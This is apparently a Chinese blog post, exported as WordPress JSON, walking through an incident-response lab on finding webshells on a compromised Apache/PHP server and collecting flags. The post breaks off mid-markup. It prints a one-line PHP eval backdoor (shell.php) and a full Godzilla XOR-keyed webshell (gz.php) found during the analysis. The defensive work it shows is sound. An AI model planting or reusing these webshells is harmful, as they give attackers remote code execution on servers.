{"id":689,"date":"2024-06-13T18:23:06","date_gmt":"2024-06-13T10:23:06","guid":{"rendered":"http:\/\/162.14.82.114\/?p=689"},"modified":"2024-06-13T18:23:06","modified_gmt":"2024-06-13T10:23:06","slug":"%e7%ac%ac%e4%b8%80%e7%ab%a0-%e5%ba%94%e6%80%a5%e5%93%8d%e5%ba%94-webshell%e6%9f%a5%e6%9d%80","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/689\/06\/13\/2024\/","title":{"rendered":"\u7b2c\u4e00\u7ae0 \u5e94\u6025\u54cd\u5e94-webshell\u67e5\u6740"},"content":{"rendered":"<h1>\u7b2c\u4e00\u7ae0 \u5e94\u6025\u54cd\u5e94-webshell\u67e5\u6740<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406131812881.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406131812881.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240613165712504\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406131812883.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406131812883.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240613172420925\" \/><\/div><\/p>\n<h2>\u67e5\u770b\u57fa\u7840\u4fe1\u606f<\/h2>\n<pre><code class=\"language-bash\">root@ip-10-0-10-3:~# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\nroot@ip-10-0-10-3:~# ls -la\ntotal 44\ndrwx------  3 root root  4096 Aug  2  2023 .\ndrwxr-xr-x 18 root root  4096 Jun 13 09:23 ..\n-rw-------  1 root root   147 Aug  2  2023 .bash_history\n-rw-r--r--  1 root root   570 Jan 31  2010 .bashrc\n-rw-------  1 root root   645 Aug  2  2023 .mysql_history\n-rw-r--r--  1 root root   148 Aug 17  2015 .profile\ndrwx------  2 root root  4096 Nov 26  2022 .ssh\n-rw-------  1 root root 10996 Aug  2  2023 .viminfo\n-rw-r--r--  1 root root   209 Aug  2  2023 .wget-hsts\nroot@ip-10-0-10-3:~# cd \/var\/log\nroot@ip-10-0-10-3:\/var\/log# ls -la\ntotal 4244\ndrwxr-xr-x  8 root  root   4096 Jun 13 09:23 .\ndrwxr-xr-x 12 root  root   4096 Aug  2  2023 ..\n-rw-r--r--  1 root  root      0 Jun 13 09:23 alternatives.log\n-rw-r--r--  1 root  root  33925 Aug  2  2023 alternatives.log.1\ndrwx------  3 root  root   4096 Aug  2  2023 amazon\ndrwxr-x---  2 root  adm    4096 Aug  2  2023 apache2\ndrwxr-xr-x  2 root  root   4096 Jun 13 09:23 apt\n-rw-r-----  1 root  adm     393 Jun 13 09:24 auth.log\n-rw-r-----  1 root  adm   23927 Jun 13 09:23 auth.log.1\n-rw-r--r--  1 root  root    600 Aug  2  2023 aws114_ssm_agent_installation.log\n-rw-r--r--  1 root  root 453632 Nov 18  2022 bootstrap.log\n-rw-rw----  1 root  utmp      0 Jun 13 09:23 btmp\n-rw-rw----  1 root  utmp      0 Nov 18  2022 btmp.1\n-rw-r--r--  1 root  adm  949278 Jun 13 09:23 cloud-init.log\n-rw-r-----  1 root  adm   38266 Jun 13 09:23 cloud-init-output.log\n-rw-r-----  1 root  adm    6750 Jun 13 09:25 daemon.log\n-rw-r-----  1 root  adm  305545 Jun 13 09:23 daemon.log.1\n-rw-r-----  1 root  adm       0 Jun 13 09:23 debug\n-rw-r-----  1 root  adm  111597 Jun 13 09:23 debug.1\n-rw-r--r--  1 root  root      0 Jun 13 09:23 dpkg.log\n-rw-r--r--  1 root  root 275700 Aug  2  2023 dpkg.log.1\n-rw-r--r--  1 root  root  32032 Aug  2  2023 faillog\n-rw-r-----  1 root  adm       0 Jun 13 09:23 kern.log\n-rw-r-----  1 root  adm  533306 Jun 13 09:23 kern.log.1\n-rw-rw-r--  1 root  utmp 292292 Jun 13 09:24 lastlog\n-rw-r-----  1 root  adm     991 Jun 13 09:23 messages\n-rw-r-----  1 root  adm  480831 Jun 13 09:23 messages.1\ndrwxr-s---  2 mysql adm    4096 Aug  2  2023 mysql\ndrwxr-xr-x  2 ntp   ntp    4096 Mar 21  2019 ntpstats\n-rw-------  1 root  root   2154 Jun 13 09:23 php7.3-fpm.log\ndrwx------  2 root  root   4096 Nov 26  2022 private\n-rw-r-----  1 root  adm    7895 Jun 13 09:25 syslog\n-rw-r-----  1 root  adm  888469 Jun 13 09:23 syslog.1\n-rw-r-----  1 root  adm     837 Jun 13 09:23 user.log\n-rw-r-----  1 root  adm   41907 Aug  2  2023 user.log.1\n-rw-rw-r--  1 root  utmp  46080 Jun 13 09:24 wtmp\nroot@ip-10-0-10-3:\/var\/log# ss -tulup\nNetid         State          Recv-Q         Send-Q                                 Local Address:Port                    Peer Address:Port                                                                                                                                                            \nudp           UNCONN         0              0                                            0.0.0.0:bootpc                       0.0.0.0:*             users:((&quot;dhclient&quot;,pid=334,fd=7))                                                                                                                 \nudp           UNCONN         0              0                                          10.0.10.3:ntp                          0.0.0.0:*             users:((&quot;ntpd&quot;,pid=451,fd=19))                                                                                                                    \nudp           UNCONN         0              0                                          127.0.0.1:ntp                          0.0.0.0:*             users:((&quot;ntpd&quot;,pid=451,fd=18))                                                                                                                    \nudp           UNCONN         0              0                                            0.0.0.0:ntp                          0.0.0.0:*             users:((&quot;ntpd&quot;,pid=451,fd=17))                                                                                                                    \nudp           UNCONN         0              0                      [fe80::dc:2ff:fe82:5464]%eth0:ntp                             [::]:*             users:((&quot;ntpd&quot;,pid=451,fd=21))                                                                                                                    \nudp           UNCONN         0              0                                              [::1]:ntp                             [::]:*             users:((&quot;ntpd&quot;,pid=451,fd=20))                                                                                                                    \nudp           UNCONN         0              0                                               [::]:ntp                             [::]:*             users:((&quot;ntpd&quot;,pid=451,fd=16))                                                                                                                    \ntcp           LISTEN         0              80                                         127.0.0.1:mysql                        0.0.0.0:*             users:((&quot;mysqld&quot;,pid=558,fd=20))                                                                                                                  \ntcp           LISTEN         0              128                                          0.0.0.0:ssh                          0.0.0.0:*             users:((&quot;sshd&quot;,pid=505,fd=3))                                                                                                                     \ntcp           LISTEN         0              128                                                *:http                               *:*             users:((&quot;apache2&quot;,pid=629,fd=4),(&quot;apache2&quot;,pid=628,fd=4),(&quot;apache2&quot;,pid=625,fd=4),(&quot;apache2&quot;,pid=624,fd=4),(&quot;apache2&quot;,pid=623,fd=4),(&quot;apache2&quot;,pid=562,fd=4))\ntcp           LISTEN         0              128                                             [::]:ssh                             [::]:*             users:((&quot;sshd&quot;,pid=505,fd=4))<\/code><\/pre>\n<p>\u5f00\u542f\u4e86Apache\u4ee5\u53camysql<\/p>\n<h2>\u9ed1\u5ba2webshell\u91cc\u9762\u7684flag<\/h2>\n<h3>\u76f4\u63a5\u67e5\u627e<\/h3>\n<p>\u8fdb\u884c\u67e5\u627e\uff1a<\/p>\n<pre><code class=\"language-bash\">root@ip-10-0-10-3:\/var\/log# cd \/var\/www\/html\nroot@ip-10-0-10-3:\/var\/www\/html# ls -la\ntotal 88\ndrwxr-xr-x 8 www-data www-data  4096 Aug  2  2023 .\ndrwxr-xr-x 3 root     root      4096 Aug  2  2023 ..\ndrwxr-xr-x 3 www-data www-data  4096 Mar 14  2021 admin\n-rwxr-xr-x 1 www-data www-data   280 Mar 14  2021 api.php\n-rwxr-xr-x 1 www-data www-data   891 Aug  2  2023 config.php\ndrwxr-xr-x 3 www-data www-data  4096 Aug  2  2023 data\n-rwxr-xr-x 1 www-data www-data   894 Mar 14  2021 favicon.ico\n-rwxr-xr-x 1 www-data www-data   142 Aug  2  2023 .htaccess\ndrwxr-xr-x 4 www-data www-data  4096 Aug  2  2023 include\n-rwxr-xr-x 1 www-data www-data   478 Mar 14  2021 index.php\n-rwxr-xr-x 1 www-data www-data 12744 Mar 14  2021 install.php\n-rw-r--r-- 1 www-data www-data  1080 Mar 14  2021 LICENSE\ndrwxr-xr-x 2 www-data www-data  4096 Aug  2  2023 pictures\n-rw-r--r-- 1 www-data www-data  2235 Mar 14  2021 README.md\n-rwxr-xr-x 1 www-data www-data  1049 Mar 14  2021 rss.php\n-rw-r--r-- 1 www-data www-data    38 Aug  2  2023 shell.php\n-rwxr-xr-x 1 www-data www-data   566 Mar 14  2021 sitemap.php\ndrwxr-xr-x 3 www-data www-data  4096 Mar 14  2021 template\ndrwxr-xr-x 3 www-data www-data  4096 Aug  2  2023 wap\nroot@ip-10-0-10-3:\/var\/www\/html# cat shell.php\n&lt;?php phpinfo();@eval($_REQUEST[1]);?&gt;root@ip-10-0-10-3:\/var\/www\/html# find .\/ -name &quot;*.php&quot; -type f 2&gt;\/dev\/null\n.\/admin\/admin.php\n.\/admin\/index.php\n.\/config.php\n.\/include\/gz.php\n.\/include\/Model\/Api.php\n.\/include\/Model\/Cms.php\n.\/include\/Model\/Spider.php\n.\/include\/Model\/User.php\n.\/include\/Model\/Template.php\n.\/include\/Model\/Config.php\n.\/include\/Model\/Sql.php\n.\/include\/Model\/Article.php\n.\/include\/Model\/Datastore.php\n.\/include\/Model\/Memcached.php\n.\/include\/Model\/Upload.php\n.\/include\/Model\/Link.php\n.\/include\/Model\/File.php\n.\/include\/Model\/Base.php\n.\/include\/Model\/Category.php\n.\/include\/Model\/Index.php\n.\/include\/Model\/Comment.php\n.\/include\/Model\/Admin.php\n.\/include\/Model\/Frame.php\n.\/include\/Db\/Sqlite.php\n.\/include\/Db\/.Mysqli.php\n.\/include\/Db\/Mysqli.php\n.\/include\/Db\/Mysql.php\n.\/include\/common.php\n.\/wap\/index.php\n.\/wap\/top.php\n.\/index.php\n.\/sitemap.php\n.\/shell.php\n.\/data\/tplcache\/taoCMS\/sidebar.php\n.\/data\/tplcache\/taoCMS\/index.php\n.\/data\/tplcache\/taoCMS\/category.php\n.\/data\/tplcache\/taoCMS\/header.php\n.\/data\/tplcache\/taoCMS\/footer.php\n.\/data\/tplcache\/taoCMS\/display.php\n.\/data\/tplcache\/taoCMS\/comments.php\n.\/data\/tplcache\/wap_index.php\n.\/data\/tplcache\/menu.php\n.\/data\/tplcache\/editfile.php\n.\/data\/tplcache\/managecomment.php\n.\/data\/tplcache\/top.php\n.\/data\/tplcache\/header.php\n.\/data\/tplcache\/formsql.php\n.\/data\/tplcache\/managelink.php\n.\/data\/tplcache\/login.php\n.\/data\/tplcache\/main.php\n.\/data\/tplcache\/manageadmin.php\n.\/data\/tplcache\/footer.php\n.\/data\/tplcache\/managefile.php\n.\/data\/tplcache\/adminframe.php\n.\/rss.php\n.\/api.php\n.\/install.php\nroot@ip-10-0-10-3:\/var\/www\/html# grep -pnir &quot;eval&quot;\ngrep: invalid option -- &#039;p&#039;\nUsage: grep [OPTION]... PATTERNS [FILE]...\nTry &#039;grep --help&#039; for more information.\nroot@ip-10-0-10-3:\/var\/www\/html# grep -Pnir &quot;eval&quot;\nadmin\/template\/images\/xheditor\/xheditor-1.1.14-zh-cn.min.js:2:if(q){try{q=eval(&quot;(&quot;+q[1]+&quot;)&quot;)}catch(t){}h=e.extend({},q,h)}q=new ra(this,h);if(q.init())this.xheditor=q,o.push(q)}});0===o.length&amp;&amp;(o=!1);1===o.length&amp;&amp;(o=o[0]);return o};var aa=0,S=!1,sa=!0,ta=!1,Sa=!1,t,ba,ca,da,K,Ea,ea,Fa,Ga,Ha,A;e(&quot;script[src*=xheditor]&quot;).each(function(){var e=this.src;if(e.match(\/xheditor[^\\\/]*\\.js\/i))return A=e.replace(\/[\\?#].*$\/,&quot;&quot;).replace(\/(^|[\\\/\\\\])[^\\\/]*$\/,&quot;$1&quot;),!1});if(h){try{document.execCommand(&quot;BackgroundImageCache&quot;,!1,!0)}catch(qb){}(I=e.fn.jquery)&amp;&amp;I.match(\/^1\\.[67]\/)&amp;&amp;\nadmin\/template\/images\/xheditor\/xheditor-1.1.14-zh-cn.min.js:93:var h=e(&quot;.xheFile&quot;,i);h.change(function(){d.startUpload(h[0],b,c,f)});setTimeout(function(){a.closest(&quot;.xheDialog&quot;).bind(&quot;dragenter dragover&quot;,N).bind(&quot;drop&quot;,function(a){var a=a.originalEvent.dataTransfer,e;j&amp;&amp;a&amp;&amp;(e=a.files)&amp;&amp;0&lt;e.length&amp;&amp;d.startUpload(e,b,c,f);return!1})},10)}};this.startUpload=function(a,b,c,f){function i(a,c){var e=Object,g=!1;try{e=eval(&quot;(&quot;+a+&quot;)&quot;)}catch(i){}e.err===$||e.msg===$?alert(b+&quot; \\u4e0a\\u4f20\\u63a5\\u53e3\\u53d1\\u751f\\u9519\\u8bef\\uff01\\r\\n\\r\\n\\u8fd4\\u56de\\u7684\\u9519\\u8bef\\u5185\\u5bb9\\u4e3a: \\r\\n\\r\\n&quot;+\nadmin\/template\/images\/xheditor\/xheditor-1.1.14-zh-cn.min.js:99:n=r.name}catch(a){}}function l(a){r.document.write(&quot;&quot;);d.removeModal();null!=a&amp;&amp;c(a)}var b=e(&#039;&lt;iframe frameborder=&quot;0&quot; src=&quot;&#039;+b.replace(\/{editorRoot}\/ig,A)+(\/\\?\/.test(b)?&quot;&amp;&quot;:&quot;?&quot;)+&quot;parenthost=&quot;+location.host+&#039;&quot; style=&quot;width:100%;height:100%;display:none;&quot; \/&gt;&lt;div class=&quot;xheModalIfmWait&quot;&gt;&lt;\/div&gt;&#039;),o=b.eq(0),s=b.eq(1);d.showModal(a,b,f,g,h);var r=o[0].contentWindow,n;j();o.load(function(){j();if(n){var a=!0;try{n=eval(&quot;(&quot;+unescape(n)+&quot;)&quot;)}catch(b){a=!1}if(a)return l(n)}s.is(&quot;:visible&quot;)&amp;&amp;(o.show().focus(),\nadmin\/template\/images\/xheditor\/jquery-1.4.4.min.js:20:e);if(e=e&amp;&amp;e.events){delete f.handle;f.events={};for(var h in e)for(var l in e[h])c.event.add(this,h,e[h][l],e[h][l].data)}}})}function Oa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:&quot;script&quot;}):c.globalEval(b.text||b.textContent||b.innerHTML||&quot;&quot;);b.parentNode&amp;&amp;b.parentNode.removeChild(b)}function oa(a,b,d){var e=b===&quot;width&quot;?a.offsetWidth:a.offsetHeight;if(d===&quot;border&quot;)return e;c.each(b===&quot;width&quot;?Pa:Qa,function(){d||(e-=parseFloat(c.css(a,&quot;padding&quot;+this))||0);if(d===&quot;margin&quot;)e+=parseFloat(c.css(a,\nadmin\/template\/images\/xheditor\/jquery-1.4.4.min.js:31:!F.call(j,&quot;constructor&quot;)&amp;&amp;!F.call(j.constructor.prototype,&quot;isPrototypeOf&quot;))return false;for(var s in j);return s===B||F.call(j,s)},isEmptyObject:function(j){for(var s in j)return false;return true},error:function(j){throw j;},parseJSON:function(j){if(typeof j!==&quot;string&quot;||!j)return null;j=b.trim(j);if(C.test(j.replace(J,&quot;@&quot;).replace(w,&quot;]&quot;).replace(I,&quot;&quot;)))return E.JSON&amp;&amp;E.JSON.parse?E.JSON.parse(j):(new Function(&quot;return &quot;+j))();else b.error(&quot;Invalid JSON: &quot;+j)},noop:function(){},globalEval:function(j){if(j&amp;&amp;\nadmin\/template\/images\/xheditor\/jquery-1.4.4.min.js:32:l.test(j)){var s=t.getElementsByTagName(&quot;head&quot;)[0]||t.documentElement,v=t.createElement(&quot;script&quot;);v.type=&quot;text\/javascript&quot;;if(b.support.scriptEval)v.appendChild(t.createTextNode(j));else v.text=j;s.insertBefore(v,s.firstChild);s.removeChild(v)}},nodeName:function(j,s){return j.nodeName&amp;&amp;j.nodeName.toUpperCase()===s.toUpperCase()},each:function(j,s,v){var z,H=0,G=j.length,K=G===B||b.isFunction(j);if(v)if(K)for(z in j){if(s.apply(j[z],v)===false)break}else for(;H&lt;G;){if(s.apply(j[H++],v)===false)break}else if(K)for(z in j){if(s.call(j[z],\nadmin\/template\/images\/xheditor\/jquery-1.4.4.min.js:39:scriptEval:false,noCloneEvent:true,boxModel:null,inlineBlockNeedsLayout:false,shrinkWrapBlocks:false,reliableHiddenOffsets:true};l.disabled=true;c.support.optDisabled=!k.disabled;b.type=&quot;text\/javascript&quot;;try{b.appendChild(t.createTextNode(&quot;window.&quot;+e+&quot;=1;&quot;))}catch(o){}a.insertBefore(b,a.firstChild);if(E[e]){c.support.scriptEval=true;delete E[e]}try{delete b.test}catch(x){c.support.deleteExpando=false}a.removeChild(b);if(d.attachEvent&amp;&amp;d.fireEvent){d.attachEvent(&quot;onclick&quot;,function r(){c.support.noCloneEvent=\nadmin\/template\/images\/xheditor\/jquery-1.4.4.min.js:54:attr:function(a,b,d,e){if(!a||a.nodeType===3||a.nodeType===8)return B;if(e&amp;&amp;b in c.attrFn)return c(a)[b](d);e=a.nodeType!==1||!c.isXMLDoc(a);var f=d!==B;b=e&amp;&amp;c.props[b]||b;var h=Ta.test(b);if((b in a||a[b]!==B)&amp;&amp;e&amp;&amp;!h){if(f){b===&quot;type&quot;&amp;&amp;Ua.test(a.nodeName)&amp;&amp;a.parentNode&amp;&amp;c.error(&quot;type property can&#039;t be changed&quot;);if(d===null)a.nodeType===1&amp;&amp;a.removeAttribute(b);else a[b]=d}if(c.nodeName(a,&quot;form&quot;)&amp;&amp;a.getAttributeNode(b))return a.getAttributeNode(b).nodeValue;if(b===&quot;tabIndex&quot;)return(b=a.getAttributeNode(&quot;tabIndex&quot;))&amp;&amp;\nadmin\/template\/images\/xheditor\/jquery-1.4.4.min.js:97:for(;u;){p.unshift(u);u=u.parentNode}for(u=m;u;){q.unshift(u);u=u.parentNode}n=p.length;m=q.length;for(u=0;u&lt;n&amp;&amp;u&lt;m;u++)if(p[u]!==q[u])return I(p[u],q[u]);return u===n?I(g,q[u],-1):I(p[u],i,1)};I=function(g,i,n){if(g===i)return n;for(g=g.nextSibling;g;){if(g===i)return-1;g=g.nextSibling}return 1}}k.getText=function(g){for(var i=&quot;&quot;,n,m=0;g[m];m++){n=g[m];if(n.nodeType===3||n.nodeType===4)i+=n.nodeValue;else if(n.nodeType!==8)i+=k.getText(n.childNodes)}return i};(function(){var g=t.createElement(&quot;div&quot;),\nadmin\/template\/images\/xheditor\/jquery-1.4.4.min.js:98:i=&quot;script&quot;+(new Date).getTime(),n=t.documentElement;g.innerHTML=&quot;&lt;a name=&#039;&quot;+i+&quot;&#039;\/&gt;&quot;;n.insertBefore(g,n.firstChild);if(t.getElementById(i)){o.find.ID=function(m,p,q){if(typeof p.getElementById!==&quot;undefined&quot;&amp;&amp;!q)return(p=p.getElementById(m[1]))?p.id===m[1]||typeof p.getAttributeNode!==&quot;undefined&quot;&amp;&amp;p.getAttributeNode(&quot;id&quot;).nodeValue===m[1]?[p]:B:[]};o.filter.ID=function(m,p){var q=typeof m.getAttributeNode!==&quot;undefined&quot;&amp;&amp;m.getAttributeNode(&quot;id&quot;);return m.nodeType===1&amp;&amp;q&amp;&amp;q.nodeValue===p}}n.removeChild(g);\nadmin\/template\/images\/xheditor\/jquery-1.4.4.min.js:104:c.contains=k.contains})();var Za=\/Until$\/,$a=\/^(?:parents|prevUntil|prevAll)\/,ab=\/,\/,Na=\/^.[^:#\\[\\.,]*$\/,bb=Array.prototype.slice,cb=c.expr.match.POS;c.fn.extend({find:function(a){for(var b=this.pushStack(&quot;&quot;,&quot;find&quot;,a),d=0,e=0,f=this.length;e&lt;f;e++){d=b.length;c.find(a,this[e],b);if(e&gt;0)for(var h=d;h&lt;b.length;h++)for(var l=0;l&lt;d;l++)if(b[l]===b[h]){b.splice(h--,1);break}}return b},has:function(a){var b=c(a);return this.filter(function(){for(var d=0,e=b.length;d&lt;e;d++)if(c.contains(this,b[d]))return true})},\nadmin\/template\/images\/xheditor\/jquery-1.4.4.min.js:108:2,&quot;previousSibling&quot;)},nextAll:function(a){return c.dir(a,&quot;nextSibling&quot;)},prevAll:function(a){return c.dir(a,&quot;previousSibling&quot;)},nextUntil:function(a,b,d){return c.dir(a,&quot;nextSibling&quot;,d)},prevUntil:function(a,b,d){return c.dir(a,&quot;previousSibling&quot;,d)},siblings:function(a){return c.sibling(a.parentNode.firstChild,a)},children:function(a){return c.sibling(a.firstChild)},contents:function(a){return c.nodeName(a,&quot;iframe&quot;)?a.contentDocument||a.contentWindow.document:c.makeArray(a.childNodes)}},function(a,\nadmin\/template\/images\/xheditor\/jquery-1.4.4.min.js:144:e=a.getResponseHeader(&quot;Etag&quot;);if(d)c.lastModified[b]=d;if(e)c.etag[b]=e;return a.status===304},httpData:function(a,b,d){var e=a.getResponseHeader(&quot;content-type&quot;)||&quot;&quot;,f=b===&quot;xml&quot;||!b&amp;&amp;e.indexOf(&quot;xml&quot;)&gt;=0;a=f?a.responseXML:a.responseText;f&amp;&amp;a.documentElement.nodeName===&quot;parsererror&quot;&amp;&amp;c.error(&quot;parsererror&quot;);if(d&amp;&amp;d.dataFilter)a=d.dataFilter(a,b);if(typeof a===&quot;string&quot;)if(b===&quot;json&quot;||!b&amp;&amp;e.indexOf(&quot;json&quot;)&gt;=0)a=c.parseJSON(a);else if(b===&quot;script&quot;||!b&amp;&amp;e.indexOf(&quot;javascript&quot;)&gt;=0)c.globalEval(a);return a}});\ninclude\/gz.php:23:              eval($payload);\ninclude\/Db\/.Mysqli.php:22:              eval($payload);\nshell.php:1:&lt;?php phpinfo();@eval($_REQUEST[1]);?&gt;\ntemplate\/taoCMS\/images\/tao.js:53:                       var resData=eval(&quot;[&quot;+xmlHttp.responseText+&quot;]&quot;);<\/code><\/pre>\n<p>\u521d\u6b65\u627e\u5230\u51e0\u4e2a\uff0c\u5c1d\u8bd5\u67e5\u770b\u4e00\u4e0b\uff0c\u5728<code>gz.php<\/code>\u627e\u5230\u4e86\u4e00\u4e2aflag\uff1a<\/p>\n<pre><code class=\"language-php\"># root@ip-10-0-10-3:\/var\/www\/html# cat include\/gz.php\n&lt;?php\n@session_start();\n@set_time_limit(0);\n@error_reporting(0);\nfunction encode($D,$K){\n    for($i=0;$i&lt;strlen($D);$i++) {\n        $c = $K[$i+1&amp;15];\n        $D[$i] = $D[$i]^$c;\n    }\n    return $D;\n}\n\/\/027ccd04-5065-48b6-a32d-77c704a5e26d\n$payloadName=&#039;payload&#039;;\n$key=&#039;3c6e0b8a9c15224a&#039;;\n$data=file_get_contents(&quot;php:\/\/input&quot;);\nif ($data!==false){\n    $data=encode($data,$key);\n    if (isset($_SESSION[$payloadName])){\n        $payload=encode($_SESSION[$payloadName],$key);\n        if (strpos($payload,&quot;getBasicsInfo&quot;)===false){\n            $payload=encode($payload,$key);\n        }\n                eval($payload);\n        echo encode(@run($data),$key);\n    }else{\n        if (strpos($data,&quot;getBasicsInfo&quot;)!==false){\n            $_SESSION[$payloadName]=encode($data,$key);\n        }\n    }\n}<\/code><\/pre>\n<h3>D\u76fe\u626b\u63cf<\/h3>\n<p>\u9996\u5148\u5148\u5bf9\u7f51\u7ad9\u8fdb\u884c\u6253\u5305\uff0c\u53ef\u4ee5\u7528<code>SFTP<\/code>\u8fdb\u884c\u4f20\u8f93\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406131812884.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406131812884.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240613173747037\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u7136\u540e\u6574\u4e2a\u4e22\u5230D\u76fe\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406131812885.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406131812885.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240613173808087\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4e5f\u53ef\u4ee5\u627e\u5230\uff01<\/p>\n<pre><code class=\"language-bash\">flag{027ccd04-5065-48b6-a32d-77c704a5e26d}<\/code><\/pre>\n<h2>\u9ed1\u5ba2\u4f7f\u7528\u7684\u4ec0\u4e48\u5de5\u5177\u7684shell<\/h2>\n<p>\u5206\u6790\u4e00\u4e0b\u8fd9\u4e2a\u6728\u9a6c\uff0c\u53d1\u73b0\u4e86\u4e00\u4e9b\u5f31\u7279\u5f81<\/p>\n<pre><code class=\"language-php\">@session_start();       # \u521b\u5efa\u4f1a\u8bdd\n@set_time_limit(0);     # \u8fde\u63a5\u65f6\u957f\u4e0d\u9650\n@error_reporting(0);    # \u5173\u6389\u9519\u8bef\u62a5\u544a<\/code><\/pre>\n<p>\u7136\u540e\u6211\u76f4\u63a5\u641c\u4e86\u4e00\u4e0b\uff0c\u53d1\u73b0\u54e5\u65af\u62c9\u7684php\u9a6c\u5b58\u5728\u4ee5\u4e0b\u7279\u5f81\uff1a<\/p>\n<ul>\n<li><code>run()<\/code>\u65b9\u6cd5\u662f\u5199\u6b7b\u5728\u653b\u51fb\u8377\u8f7d\u91cc\u9762\u7684\uff0c\u4ee3\u7801\u4e00\u5b9a\u4f1a\u8c03\u7528\u8fd9\u4e2a\u65b9\u6cd5\u6267\u884c\u4f20\u5165\u7684\u53c2\u6570\u3002<\/li>\n<li>\u6709\u4e00\u4e2a\u5411<code>SESSION<\/code>\u4e2d\u5b58\u50a8\u653b\u51fb\u8377\u8f7d\u7684\u8fc7\u7a0b\u3002<\/li>\n<li>\u4f1a\u5c06\u4f20\u5165\u7684\u53c2\u6570\u89e3\u5bc6\u3001\u62fc\u63a5\u540e\u53d6MD5\uff0c\u524d16\u4f4d\u52a0\u5230\u56de\u663e\u7684\u524d\u7aef\uff0c\u5176\u4f59\u7684\u90e8\u5206\u52a0\u5230\u56de\u663e\u7684\u540e\u7aef\uff08\u8fd9\u91cc\u597d\u50cf\u6ca1\u6709\u6d89\u53ca\u5230\uff0c\u8fd9\u4e2a\u7279\u5f81\u8fd8\u6bd4\u8f83\u660e\u663e\u7684\uff09<\/li>\n<\/ul>\n<p>\u7136\u540e\u4e0a\u7f51\u627e\u4e00\u4e0b\u54e5\u65af\u62c9\u7684\u9879\u76ee\u4f4d\u7f6e\uff1a<a href=\"https:\/\/github.com\/BeichenDream\/Godzilla\">https:\/\/github.com\/BeichenDream\/Godzilla<\/a><\/p>\n<pre><code class=\"language-bash\">root@ip-10-0-10-3:\/var\/www\/html# echo -n &#039;https:\/\/github.com\/BeichenDream\/Godzilla&#039; | md5sum\n39392de3218c333f794befef07ac9257  -<\/code><\/pre>\n<p>\u5f97\u5230\u7b2c\u4e8c\u4e2aflag\uff01<\/p>\n<pre><code 